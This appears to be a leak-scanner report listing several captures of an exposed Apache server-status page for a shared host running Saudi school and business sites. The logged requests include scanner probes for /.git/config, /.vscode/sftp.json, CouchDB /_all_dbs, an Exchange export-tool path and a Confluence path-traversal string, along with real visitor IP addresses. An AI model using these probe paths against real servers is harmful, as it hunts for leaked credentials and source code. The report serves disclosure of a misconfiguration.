      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-12142300/31/4442_
      3.8999081467990.00.86527.40
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=5&q=359&t=5.9.156.20&c=5 HTTP/1.
      
      0-12142300/24/4072_
      3.692095278675960.04.60890.75
      123.145.6.156http/1.1sulaimaniya.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-12142300/30/3784_
      3.8965061328560.01.32668.32
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=5&q=438&t=88.198.0.163&c=5 HTTP/
      
      0-12142300/17/4387_
      3.7413811765035280.01.75594.41
      188.114.102.122http/1.1qr.brunch.ws:443GET /storage/category_image/17098165745683_17.png HTTP/1.1
      
      0-12142300/24/3939_
      3.711455126098130.00.60692.64
      94.98.37.6http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-12142300/23/3871_
      3.87132481835390.03.05711.78
      94.98.37.6http/1.1jawad.com.sa:443GET /public/front_resources/css/owl.carousel.min.css HTTP/1.1
      
      0-121423011/37/4439K
      3.9520760822310.30.75726.96
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=5&q=368&t=92.220.10.100&c=5 HTTP
      
      0-12142300/22/4064_
      3.76138477038700.01.74603.70
      188.114.102.86http/1.1qr.brunch.ws:443GET /storage/food_image/17095846781958_turkish.webp HTTP/1.1
      
      0-12142300/31/4297_
      3.922414768782120.02.59543.47
      188.30.5.61http/1.1akg.sa:443GET /_next/static/chunks/pages/_app.js?ts=1716420123042 HTTP/1.
      
      0-12142300/84/4255_
      3.82137684924890.01.97664.27
      188.114.102.17http/1.1qr.brunch.ws:443GET /storage/food_image/17096787428094_pinaple.webp HTTP/1.1
      
      0-12142300/37/3976_
      3.84135264522720.01.88467.36
      188.114.102.201http/1.1qr.brunch.ws:443GET /storage/food_image/17162864494425_frenchlatteaulatte.jpg H
      
      0-12142300/33/3894_
      3.85135566386040.01.30663.15
      188.114.102.116http/1.1qr.brunch.ws:443GET /storage/food_image/17088461776104_oip7.jpg HTTP/1.1
      
      0-12142300/39/4433_
      3.77138265104960.01.36740.75
      188.114.102.35http/1.1qr.brunch.ws:443GET /storage/food_image/17096781872999_petti.webp HTTP/1.1
      
      0-12142300/22/4387_
      3.77138278438080.02.48540.93
      188.114.102.18http/1.1qr.brunch.ws:443GET /storage/food_image/17095827544263_edamcroissant.jpg HTTP/1
      
      0-12142300/31/4071_
      3.76138269171280.00.37683.25
      188.114.102.45http/1.1qr.brunch.ws:443GET /storage/food_image/17096758853845_hallomi.webp HTTP/1.1
      
      0-12142300/26/3713_
      3.84135467490500.01.59547.48
      188.114.102.15http/1.1qr.brunch.ws:443GET /storage/food_image/17162863264413_almondcoffeecup.jpg HTTP
      
      0-12142301/20/4184K
      3.9601112832870.91.24677.27
      172.71.250.73http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-12142300/29/3826_
      3.86135571532570.02.38491.43
      188.114.102.27http/1.1qr.brunch.ws:443GET /storage/food_image/17162871173606_novawatersmall.jpg HTTP/
      
      0-12142300/23/3917_
      3.811375100140840.03.22675.12
      188.114.102.203http/1.1qr.brunch.ws:443GET /storage/food_image/17096777827045_tresh.webp HTTP/1.1
      
      0-12142300/38/4326_
      3.9051064211450.00.88655.56
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=5&q=363&t=88.198.33.145&c=5 HTTP
      
      0-12142307/86/4287K
      3.951560682709.91.71917.32
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=5&q=368&t=92.220.10.100&c=5 HTTP
      
      0-12142300/19/4021_
      3.77138270227100.00.62604.04
      188.114.102.35http/1.1qr.brunch.ws:443GET /storage/food_image/17096783429150_lamp.webp HTTP/1.1
      
      0-12142300/19/3905_
      3.78137577757150.01.39769.17
      188.114.102.9http/1.1qr.brunch.ws:443GET /storage/food_image/17088499495311_img5d0fa3d62169406cac3fd
      
      0-12142300/22/3926_
      3.77138276182300.03.14641.54
      188.114.102.30http/1.1qr.brunch.ws:443GET /storage/food_image/17096782254653_salmon.webp HTTP/1.1
      
      0-12142300/23/4397_
      3.88128275804590.01.00827.50
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1716420024.88208603858947753906
      
      1-12142580/72/3827_
      4.161378104500050.00.91649.11
      188.114.102.118http/1.1qr.brunch.ws:443GET /storage/food_image/17096777031953_fondont.webp HTTP/1.1
      
      1-12142580/24/3967_
      4.11138771887210.01.33603.76
      188.114.102.46http/1.1qr.brunch.ws:443GET /storage/category_image/17098164579039_13.png HTTP/1.1
      
      1-12142580/52/3341_
      4.06186077507990.08.67551.89
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=5&q=356&t=192.99.37.116&c=5 HTTP
      
      1-12142580/19/3664_
      4.0715220561078000.01.18484.83
      66.249.64.12http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A7%D9%84%D8%B4%D9%83%D8%B1%D9%88%D8%A7%D9%
      
      1-12142580/34/3410_
      4.14138254815650.01.28391.25
      188.114.102.138http/1.1qr.brunch.ws:443GET /storage/food_image/17088540548488_img773eaf041bc94628a6943
      
      1-12
      Found on 2024-05-22 23:22
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df77b625557

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Thursday, 16-May-2024 00:57:15 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 14
      Parent Server MPM Generation: 13
      Server uptime:  16 days 4 hours 20 minutes 31 seconds
      Server load: 0.36 0.27 0.21
      Total accesses: 2134765 - Total Traffic: 491.4 GB - Total Duration: 5327328552
      CPU Usage: u630.47 s26.58 cu9191.94 cs2738.04 - .9% CPU load
      1.53 requests/sec - 368.5 kB/second - 241.3 kB/request - 2495.51 ms/request
      38 requests currently being processed, 0 workers gracefully restarting, 87 idle workers
      ........................._K__________KK_K_K____KK_..............
      ................................................................
      ......................KK___________WKKK_K_K_____________CR___KKK
      _K______K_________WR__K___K___KKKK_K____R___KK__K______KKK......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-12-0/0/12341.
      0.00574274193290.00.002813.40
      195.191.219.131http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1220&t=144.76.120.197&c=5 HTT
      
      0-12-0/0/12301.
      0.00570194278150.00.002390.17
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1219&t=144.76.81.229&c=5 HTTP
      
      0-12-0/0/12564.
      0.00570260345800.00.003172.84
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1285&t=148.251.69.139&c=5 HTT
      
      0-12-0/0/12372.
      0.005723239175120.00.003068.11
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D8%AE%D8%A
      
      0-12-0/0/11893.
      0.005754215186680.00.002649.58
      4.242.218.139http/1.1daris.live:80GET /files HTTP/1.1
      
      0-12-0/0/11563.
      0.00571613487280.00.003312.44
      172.70.115.135http/1.1nidaa.ws:80GET /.well-known/pki-validation/807A888B253E7AF7A80C419531042AC
      
      0-12-0/0/11728.
      0.005716524278978030.00.002779.03
      142.247.104.109http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-12-0/0/11971.
      0.00570236109230.00.003245.18
      217.113.194.253http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=69&t=217.113.194.99&c=5 HTTP
      
      0-12-0/0/12153.
      0.0057231152649380.00.002922.49
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D8%AE%D8%A
      
      0-12-0/0/11910.
      0.005724923219347290.00.002569.33
      142.247.104.109http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-12-0/0/12275.
      0.00573115288193900.00.003245.40
      82.167.92.141http/1.1albayan.edu.sa:443GET /imgweb/cur1438/3/matst1.pdf HTTP/1.1
      
      0-12-0/0/12139.
      0.00570354766250.00.003389.99
      51.83.238.93http/1.13dvi.com:80GET /wp-content/themes/twentystd/ HTTP/1.1
      
      0-12-0/0/11623.
      0.00570239537860.00.002575.40
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1330&t=65.108.0.71&c=5 HTTP/1
      
      0-12-0/0/11940.
      0.00570252518190.00.002597.20
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=167.114.64.97&c=5 HTTP
      
      0-12-0/0/12254.
      0.00570268151570.00.002915.74
      172.70.251.81http/1.1nidaa.ws:80GET /.well-known/pki-validation/807A888B253E7AF7A80C419531042AC
      
      0-12-0/0/12083.
      0.0057428216132000.00.002999.67
      192.30.83.56http/1.1sulaimaniya.edu.sa:443GET / HTTP/1.1
      
      0-12-0/0/11804.
      0.00570217896260.00.002492.98
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=195.191.219.131&c=5 HT
      
      0-12-0/0/12118.
      0.00573314459940.00.002891.96
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1715810093.29975795745849609375
      
      0-12-0/0/11690.
      0.00579242255040.00.002988.46
      217.113.194.243http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=1903 HTTP/1.1
      
      0-12-0/0/11413.
      0.005725233701940.00.002812.87
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file44/%D8%AA%D9%86%D8%B6%D8%A8%D8%A7%D8%B7%20%D8%A
      
      0-12-0/0/12034.
      0.00570213129150.00.002596.11
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1219&t=195.191.219.130&c=5 HT
      
      0-12-0/0/12235.
      0.00573245745600.00.002606.05
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1298&t=65.108.0.71&c=5 HTTP/1
      
      0-12-0/0/11860.
      0.00570327135340.00.003006.13
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1300&t=3.239.192.241&c=5 HTTP
      
      0-12-0/0/11504.
      0.005758228349180.00.003177.30
      4.242.218.139http/1.1daris.live:80GET /uploads HTTP/1.1
      
      0-12-0/0/12982.
      0.00570359144230.00.002894.29
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=194.247.173.99&c=5 HTT
      
      1-1336270/1/12588_
      0.021024275595750.00.132468.80
      139.59.132.8http/1.1
      
      1-13362725/25/12124K
      0.33252294531921.30.023009.38
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1251&t=195.191.219.133&c=5 HT
      
      1-1336270/2/11880_
      0.04100270582610.00.003062.14
      167.99.210.137http/1.1
      
      1-1336270/3/11403_
      0.27785965233820.00.012715.43
      139.59.132.8http/1.1albayan.akgsa.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-1336270/1/11546_
      0.041025276409880.00.182766.30
      167.99.210.137http/1.1
      
      1-1336270/2/12601_
      0.26782366247690.00.153107.12
      139.59.132.8http/1.1albayan.akgsa.com:443GET /about HTTP/1.1
      
      1-1336270/2/12305_
      0.2961462758411
      Found on 2024-05-15 21:57
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7f7546bba

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Monday, 13-May-2024 04:02:30 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 12
      Parent Server MPM Generation: 11
      Server uptime:  13 days 7 hours 25 minutes 45 seconds
      Server load: 0.46 0.48 0.45
      Total accesses: 1639474 - Total Traffic: 409.2 GB - Total Duration: 4306194060
      CPU Usage: u574.6 s36.8 cu7118.03 cs2167.81 - .861% CPU load
      1.43 requests/sec - 373.1 kB/second - 261.7 kB/request - 2626.57 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 138 idle workers
      _______W_______K________R.......................................
      ..........._____K_____K_____________............................
      ................................................................
      .................................___W_______________K____W______
      _______________K_________________W____K_________________K_______
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-11154900/62/8906_
      11.851608043183333480.06.072034.64
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154900/112/9192_
      11.762593139186900.05.771940.13
      66.249.64.7http/1.1hawsab.me:80GET /?zpw20192bookgq607.html HTTP/1.1
      
      0-11154900/74/9253_
      11.72412193736960.012.622527.83
      212.34.13.65http/1.1
      
      0-11154900/81/9364_
      11.7333142181395720.029.942480.69
      66.249.64.96http/1.1akg.sa:443GET /uploads/nodejs_a54e5e651b.svg HTTP/1.1
      
      0-11154900/101/8649_
      11.84192198157431560.01.552189.67
      31.166.69.135http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D8%AC%D8%AA%D9%85%
      
      0-11154900/86/8574_
      11.92123675537490700.03.492525.40
      162.214.197.33http/1.1zed.sa:443POST /wp-login.php HTTP/1.1
      
      0-11154900/131/8677_
      11.762731200640760.022.412305.35
      31.166.69.135http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.ttf HTTP/1.1
      
      0-11154900/93/8854W
      11.681060160415030.04.482464.66
      51.252.138.90http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      0-11154900/126/8741_
      12.1580654611069707030.028.892465.65
      95.218.207.59http/1.1sulaimaniya.edu.sa:443GET /download/89/%D8%A7%D9%84%D9%85%D8%B1%D8%AD%D9%84%D8%A9-%D8
      
      0-11154900/60/8910_
      11.8221414164499060.023.102052.42
      153.94.70.72http/1.1jawad.com.sa:443POST /api/v.1/front/related/product HTTP/1.1
      
      0-11154900/50/8998_
      11.74286403232880540.012.922527.78
      182.42.111.213http/1.1daris.live:80GET / HTTP/1.1
      
      0-11154900/120/8871_
      11.812306012276214680.01.642776.00
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154900/83/8492_
      11.772553154313510.03.412089.01
      136.243.36.230http/1.1akg.sa:443GET /_next/static/development/_buildManifest.js HTTP/1.1
      
      0-11154900/65/8591_
      11.7628062182712890.04.702128.18
      114.119.137.193http/1.13dvi.com:443GET /view_portfolio.php?ID=63 HTTP/1.1
      
      0-11154900/106/9094_
      12.15726098172139600.036.512290.80
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154901/47/8912K
      12.1700155888890.810.432434.70
      172.70.246.122http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-11154900/71/8823_
      12.1652510162590610.010.222057.00
      95.178.86.196http/1.1albayan.edu.sa:443GET /imgweb/file42/%D8%A8%D9%86%D9%83%20%D8%A3%D8%B3%D8%A6%D9%8
      
      0-11154900/90/8842_
      11.733116216244002360.03.332426.87
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154900/95/8532_
      11.8221866192703090.056.402502.57
      83.147.52.42http/1.1alezdhar.com:443GET /.git/config HTTP/1.1
      
      0-11154900/127/8337_
      12.1790177247320.06.352250.27
      66.249.64.8http/1.1albayan.edu.sa:80GET / HTTP/1.1
      
      0-11154900/69/8982_
      11.841826340150986610.02.232135.34
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154900/130/8816_
      12.16545959186420550.05.322099.85
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154900/140/8929_
      11.79247354244124260.071.872454.72
      5.255.231.137http/1.1albayan.edu.sa:443GET /imgweb/file44/WBs%20on%20Site%2022-23/9th/9th%20Reading%20
      
      0-11154900/61/8490_
      11.8124283169356420.0119.502385.01
      91.92.250.127http/1.1trynidaa.com:443GET /.git/config HTTP/1.1
      
      0-11154900/76/9343W
      11.7300288493410.04.552441.84
      51.211.27.39http/1.1sulaimaniya.edu.sa:443GET /download/85/%D8%A7%D9%84%D8%B5%D9%81-%D8%A7%D9%84%D8%AE%D8
      
      1-10-0/0/9672.
      0.00109930223196690.00.002141.29
      96.126.110.74http/1.1sradmin.3dvi.com:80GET /_all_dbs HTTP/1.1
      
      1-10-0/0/9222.
      0.00109936011198297800.00.002652.31
      159.89.127.165http/1.1
      
      1-10-0/0/9332.
      0.00109930210437960.00.002502.41
      159.223.132.86http/1.1php.we3dvi.com:80\x16\x03\x01\x01\x03\x01
      
      1-10-0/0/8683.
      0.001099323921341590.00.002348.91
      167.71.175.236http/1.1proxy-subdomains-vhost.localhosGET /_all_dbs HTTP/1.1
      
      1-10-0/0/8892.
      0.001099323212342160.00.002163.56
      195.191.219.132http/1.1albayan.edu.sa:443GET /imgweb/1445/%D9%85%D8%AC%D8%A7%D9%84%D8%A7%D8%AA%20%D8%A5%
      
      1-10-0/0/9419.
      0.0010993472332053540.00.002792.29
      168.149.96.57http/1.1zed.sa:443GET /menu/wp-content/uploads/2023/06/65-Zed-BrandGuideline-Apri
      
      1-10-0/0/9629.
      0.00109931225489210.00.002391.55
      159.223.132.86http/1.1sradmin.3dvi.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-10-0/0/9461.
      0.00109930180598740.
      Found on 2024-05-13 01:02
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7604bd8f2

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Monday, 13-May-2024 01:26:14 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 12
      Parent Server MPM Generation: 11
      Server uptime:  13 days 4 hours 49 minutes 30 seconds
      Server load: 0.41 0.41 0.41
      Total accesses: 1629108 - Total Traffic: 407.5 GB - Total Duration: 4282381965
      CPU Usage: u529.25 s25.09 cu7118.03 cs2167.81 - .863% CPU load
      1.43 requests/sec - 374.6 kB/second - 262.3 kB/request - 2628.67 ms/request
      18 requests currently being processed, 0 workers gracefully restarting, 132 idle workers
      _______________________K_.......................................
      ...........W_K___K__________________............................
      ................................................................
      .................................___________R____K__K_______K___
      R_______K_K______________W______K________R________RK__K_________
      ___K_...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-11154900/17/8861_
      3.0129124181662330.00.452029.02
      178.86.6.240http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-11154900/16/9096_
      2.9971110137999570.00.601934.96
      178.86.6.240http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-11154900/27/9206_
      2.98805191665980.00.552515.77
      178.86.6.240http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-11154900/31/9314_
      3.0650178638230.01.762452.51
      178.20.44.82http/1.1akg.sa:80GET /_next/static/chunks/pages/_app.js HTTP/1.1
      
      0-11154900/11/8559_
      2.8915595155820390.00.232188.36
      178.128.207.138http/1.1sulaimaniya.edu.sa:443GET /about HTTP/1.1
      
      0-11154900/10/8498_
      3.05173537192730.00.092522.00
      150.109.13.194http/1.1akgsa.com:443GET / HTTP/1.1
      
      0-11154900/18/8564_
      1.591666021197507550.01.092284.02
      197.39.137.194http/1.1
      
      0-11154900/27/8788_
      3.00465934159342040.01.212461.39
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154900/11/8626_
      2.98872321067718210.09.132445.88
      178.86.6.240http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-11154900/10/8860_
      3.00586093163062130.00.452029.77
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154900/10/8958_
      2.8914970232095630.06.352521.21
      178.128.207.138http/1.1sulaimaniya.edu.sa:443GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-11154900/59/8810_
      2.9511318275292220.00.352774.70
      54.36.148.175http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=504 HTTP/1.1
      
      0-11154900/14/8423_
      3.042214152926470.00.632086.23
      136.243.36.230http/1.1akg.sa:443GET /_next/static/chunks/react-refresh.js HTTP/1.1
      
      0-11154900/18/8544_
      3.05836178692410.00.952124.44
      178.20.44.82http/1.1akg.sa:443GET /_next/static/chunks/polyfills.js HTTP/1.1
      
      0-11154900/13/9001_
      2.987047169931960.027.402281.69
      5.255.231.25http/1.1akg.sa:443GET /sitemap46.xml HTTP/1.1
      
      0-11154900/11/8876_
      3.03211711154580140.01.562425.83
      136.243.36.230http/1.1akg.sa:443GET /_next/static/chunks/main.js HTTP/1.1
      
      0-11154900/27/8779_
      2.881713161017480.00.942047.72
      54.36.148.144http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=505 HTTP/1.1
      
      0-11154900/12/8764_
      2.921245243163180.00.962424.49
      178.86.6.240http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-11154900/9/8446_
      3.013120190874890.028.802474.97
      54.36.148.48http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=944 HTTP/1.1
      
      0-11154900/38/8248_
      2.89151206175640320.01.782245.70
      eab9c05722.scan.leakix.orghttp/1.1sulaimaniya.edu.sa:443GET /server-status HTTP/1.1
      
      0-11154900/11/8924_
      2.92131488148804340.00.222133.33
      178.86.6.240http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-11154900/29/8715_
      2.95910185184670.02.542097.07
      66.249.64.9http/1.1albayan.edu.sa:80GET /web.html HTTP/1.1
      
      0-11154900/13/8802_
      2.9412869240880770.065.732448.58
      37.139.53.188http/1.1albayan.edu.sa:443GET /web.html HTTP/1.0
      
      0-11154901/16/8445K
      3.0611167282290.752.892318.40
      162.158.62.69http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-11154900/11/9278_
      3.0227104287138370.00.812438.10
      178.86.6.240http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      1-10-0/0/9672.
      0.0016180223196690.00.002141.29
      96.126.110.74http/1.1sradmin.3dvi.com:80GET /_all_dbs HTTP/1.1
      
      1-10-0/0/9222.
      0.0016186011198297800.00.002652.31
      159.89.127.165http/1.1
      
      1-10-0/0/9332.
      0.0016180210437960.00.002502.41
      159.223.132.86http/1.1php.we3dvi.com:80\x16\x03\x01\x01\x03\x01
      
      1-10-0/0/8683.
      0.00161823921341590.00.002348.91
      167.71.175.236http/1.1proxy-subdomains-vhost.localhosGET /_all_dbs HTTP/1.1
      
      1-10-0/0/8892.
      0.00161823212342160.00.002163.56
      195.191.219.132http/1.1albayan.edu.sa:443GET /imgweb/1445/%D9%85%D8%AC%D8%A7%D9%84%D8%A7%D8%AA%20%D8%A5%
      
      1-10-0/0/9419.
      0.001618472332053540.00.002792.29
      168.149.96.57http/1.1zed.sa:443GET /menu/wp-content/uploads/2023/06/65-Zed-BrandGuideline-Apri
      
      1-10-0/0/9629.
      0.0016181225489210.00.002391.55
      159.223.132.86http/1.1sradmin.3dvi.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-10-0/0/9461.
      0.0016180180598740.00.00
      Found on 2024-05-12 22:26
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df72d34c1cd

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Wednesday, 08-May-2024 19:11:38 +03
